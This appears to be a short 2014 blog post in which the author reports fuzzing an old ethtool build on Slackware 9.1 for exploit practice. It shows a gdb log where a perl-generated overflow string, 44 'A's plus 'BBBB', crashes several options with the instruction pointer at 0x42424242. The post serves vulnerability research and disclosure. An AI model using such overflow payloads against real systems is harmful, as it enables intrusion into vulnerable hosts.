Friday, 11 April 2014

[EN] Old-school buffer overflow - ethtool

During the last few days I was checking some old apps for Slackware 9.1. My goal was to find some useful bugs to write a few exploits (just for practice, of course). During simple fuzzing, I found that 'ethtool' is vulnerable to buffer overflow in a few places.

Below is a short note from testing (overflow in '-k' param):

---<code>---
tester@box:~/code/tests/ethtool-3 $ head README
ethtool is a small utility for examining and tuning your ethernet-based
network interface. See the man page for more details.
tester@box:~/code/tests/ethtool-3 $ head NEWS

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) r -r ` perl -e 'print "A"x44,"BBBB"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) r -p ` perl -e 'print "A"x44,"BBBB"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) r -t ` perl -e 'print "A"x44,"BBBB"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) r -s ` perl -e 'print "A"x44,"BBBB"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y